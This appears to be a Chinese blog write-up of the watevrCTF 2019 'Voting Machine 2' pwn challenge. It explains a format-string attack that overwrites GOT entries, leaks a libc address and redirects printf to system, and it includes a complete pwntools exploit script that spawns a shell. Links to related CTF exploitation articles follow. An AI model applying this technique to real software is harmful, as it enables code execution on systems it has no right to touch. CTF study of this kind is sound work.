【PWN · 格式化字符串|劫持GOT表】[watevrCTF 2019]Voting Machine 2]

于 2024-01-18 09:58:35 发布
阅读量509 收藏 9
点赞数 11
分类专栏: 格式化字符串漏洞 文章标签: 格式化字符串漏洞 CTF PWN GOT表劫持
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mr_Fmnwon/article/details/135666480
版权

劫持GOT表:后门 or getshell

目录

前言

思路

EXP

总结

一、前言

和以往不同的是,格式化字符产参数没有对齐,有两个字节的偏移需要自己填充或者交给fmtstr_payload的参数进行构造。

可以通过后门函数获得flag或者getshell获得flag

二、思路

非预期解

可恶!没有看到后门函数呜呜呜

1.将exit(0)劫持到main以便于重复利用

2.%s泄露got表->libc信息

3.劫持printf为system,构造printf('/bin/sh\x00')

预期解:

 

劫持到后门函数即可

三、EXP

from pwn import *
from pwn import p32
from LibcSearcher import *
context(arch='i386',log_level='debug')

io=process('./pwn')
elf=ELF('./pwn')
# gdb.attach(io)
# input()
exit_got=elf.got['exit']
main=0x84207FB

payload=fmtstr_payload(7,{exit_got:main},offset_bytes=2)
io.sendlineafter(b'Topic: ',payload)

printf_got=elf.got['printf']
print(hex(printf_got))
payload=b'aa'+p32(printf_got)+b'cccc'+b'%8$s'+b'cccc'

io.sendlineafter(b'Topic: ',payload)
io.recvuntil(b'cccc')
printf_real=u32(io.recvuntil(b'cccc',drop=True)[:4])

libc=LibcSearcher('printf',printf_real)
libc_base=printf_real-libc.dump('printf')
system=libc_base+libc.dump('system')
payload=fmtstr_payload(7,{printf_got:system},offset_bytes=2)
io.sendlineafter(b'Topic: ',payload)
io.sendline(b'/bin/sh\x00')
io.interactive()

四、总结

存在两个字节的偏移,fmtstr_payload的各个参数含义要好好掌握。

Mr_Fmnwon
关注
  • 11
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn学习】GOT劫持
Morphy_Amo的博客
12-15 3891
文章目录例题GOT劫持获取Syscallopen-read-write利用系统调用号调用open构造payload获取syscall读取flag文件exp 例题 例题:XCTF-008-Recho 查看安全策略 root@kali:~/ctf/xctf/pwn# checksec 008_Recho [*] '/root/ctf/xctf/pwn/008_Recho' Arch: amd64-64-little RELRO: Partial RELRO Stac
ciscn-2019-pwn
11-29
- **baby_pwn** 文件可能是最简单的,设计用来教授基本的堆栈溢出或格式字符串攻击等基础知识。 总的来说,"ciscn-2019-pwn"挑战涉及了网络安全中的漏洞利用技术,参赛者需要具备逆向工程、内存安全理解、编程和...
open和closed_劫持got绕过disable_functions
weixin_39559559的博客
11-24 777
最近阅读了芝士狍子糕师傅写的针对宝塔的RASP及其disable_functions的绕过的文章。觉得其中劫持got来绕过disable_functions的方法还是比较有意思的,对于web手来说也是比较好理解的。这里通过web手的视角来理解这种绕过disable_functions的方法。前置知识/proc目录Linux系统上的/proc目录是一种文件系统,即proc文件系统。/pr...
Pwn_11 Got 劫持
weixin_30822451的博客
03-08 433
比如说 把puts(str)的.got.plt的地址的值改为system函数地址 格式化字符串的综合利用 可以使用任意地址读取,获取当前函数的实际地址,从而可以获得libc的基地址 利用libc基地址+偏移地址 可以知道其他函数地址 利用任意地址写入,从而配合got hijacking更改已有函数地址   from pwn import *r = remote('127.0....
从c语言到汇编指令 长亭科技,从0开始CTF-PWN(四)ROP绕过栈可执行保护与GOT劫持...
weixin_34440860的博客
05-21 325
int main(int argc, char* argv[]) {char buf[128];if (argc < 2) return 1;strcpy(buf, argv[1]);printf("Input:%sn", buf);return 0;}使用如下命令进行编译:gcc-4.8 -g -m32 -O0 -fno-stack-protector -o pwn_test_bof3_3...
watevrCTF 2019 Voting Machine 1
最新发布
2301_79793667的博客
12-12 85
发现了危险函数gets,通过输入v4的值可以达成溢出,shift+f12还发现了一个打开flag文本的指令,可以将溢出点导到此处。recvall接取数据流,赋值给flag,打印flag就能看到flag。直接进行nc连接,根据提示随意输入一个数字,发现会被弹出程序交互。那我们检查一下附件,然后用ida打开。打开flag文本的指令的地址为。首先打开环境,下载附件。
PWN2PLY:从PWN格式到PLY格式的转换器-matlab开发
05-30
PWN2PLY 是一个 GUI 应用程序,专门用于将 PWN 文件转换为 PLY 格式。 该应用程序应用一种算法来构建一个网格,可记录为 PLY 格式(多边形,更准确地说是三角形),从一组法线和 PWN 文件的应用点(带法线的点)。 ...
pwn07.ret2syscall例题
11-11
ret2syscall例题
pwn2own2020:通过链接六个漏洞通过Safari破坏macOS内核
02-04
通过链接六个漏洞通过Safari破坏macOS内核 总览 该存储库包含利用和技术细节,并。 有关更多信息,您还可以查看。 该存储库还包括成功利用。 如何繁殖 ... ... 通过Safari使用攻击者服务器的IP访问网站: ...
Python库 | pwn-machine-1.1.tar.gz
03-11
Python库“pwn-machine-1.1.tar.gz”是一个用于网络安全和漏洞利用开发的工具集。这个库专门针对那些对安全研究和逆向工程感兴趣的开发者和爱好者。在Python中,库是可重用代码的集合,它使得程序员能够快速地构建...
变量是什么_GOT劫持PWN
weixin_39628247的博客
12-08 534
声明:由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,知微安全以及文章作者不为此承担任何责任。知微安全拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经知微安全允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。上次介绍IO FILE的pwn题目时,提到exit函数中,会调用标准...
nss_pwn部分题解
2302_79483906的博客
11-18 433
在函数开始时,通常会将当前函数的rbp保存起来,然后设置新的rbp作为当前栈帧的基址指针,这样可以方便地访问函数的局部变量和参数。附件内容为一个python代码,其中blacklist = ['cat','ls',' ','cd','echo','
栈溢出——一种经典的got泄露解法
qq_47841160的博客
11-21 217
如果是第一次调用,.got.plt中存储的是.plt中下一条指令的地址,此时,程序会通过一系列执行将真正的函数入口地址填充入.got.plt中,这时候如果有办法拿到这个地址我们就可以通过该地址爆破出对应的依赖并获得重要的system函数地址和/bin/sh字符串地址。命令执行结果如下图所示。如上图所示可以看到该题是一个64位程序,没有RELRO,cannary和PIE防护,栈不可执行,这意味着.got.plt可以修改,溢出时不需要考虑获取特殊的标志,.plt和.got.plt在内存中的地址已知。
NSSCTF Pwn Page 1 - 2
红叶的博客
03-14 1690
NSSCTF Pwn 第一页到第二页全部题目解析。 刷了大概一个月的NSSCTF,对Pwn的理解更高了,虽然也没高到哪去。
[watevrCTF 2019]Voting Machine 1
沈理大学牲的博客
10-30 248
shiift+F12查找字符串,发现flag.text跟踪。简单的栈溢出距离RBP 0X2并且是64位。
格式化字符串漏洞 | 劫持printf_got】[Google CTF]fmt_pwn
Mr_Fmnwon的博客
10-29 519
浅记录一下格式化字符串劫持printf_got,比较简单,仅记录exp。
buuoj Pwn writeup 201-205
yongbaoii的博客
08-31 455
201 bbctf_2020_write canary是没有开的。环境是2.27的一个环境。 可以看到首先进去会给一个puts的地址,然后我们就可以获得libc的基地址。 又给出了一个栈地址,我们考虑可以直接去劫持got,但是发现got不能写。 那我们去考虑劫持main函数返回地址,但是又发现最后用exit去结束的。 exit没有hook,我们考虑怎么能把exit劫持掉。 劫持exit 简单点说就是。 exit()->__run_exit_handlers->_dl_fini->_
buuoj Pwn writeup 191-195
yongbaoii的博客
06-12 537
191 huxiangbei_2019_hacknote 192 pwnable_simple_login 193 mrctf2020_spfa 194 360chunqiu2017_smallest 195 watevr_2019_voting_machine_1
BUUCTF [watevrCTF-2019] Supercalc
Senimo
12-20 829
BUUCTF [watevrCTF-2019] Supercalc 考点: session伪造 通过session拼接语句 {{config}}获取SECRET_KEY的值 启动环境: 是一个类似计算机的功能,又一个输入框,尝试输入1+1: 得到计算结果,开始想到的是SQL注入,简单测试了几个payload,都没太有反应,继续对题目进行信息收集 在HTTP请求中,查看到Cookie信息: 可以获取到session: session=eyJoaXN0b3J5IjpbeyJjb2RlIjoiMSArI
pwn格式化字符串漏洞
08-30
pwn中的格式化字符串漏洞是指通过向程序输入格式化字符串,然后利用程序内部的输出函数来读取或修改内存中的数据。这种漏洞会导致程序的安全性受到威胁,攻击者可以利用该漏洞执行任意代码或者获取敏感信息。 格式...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值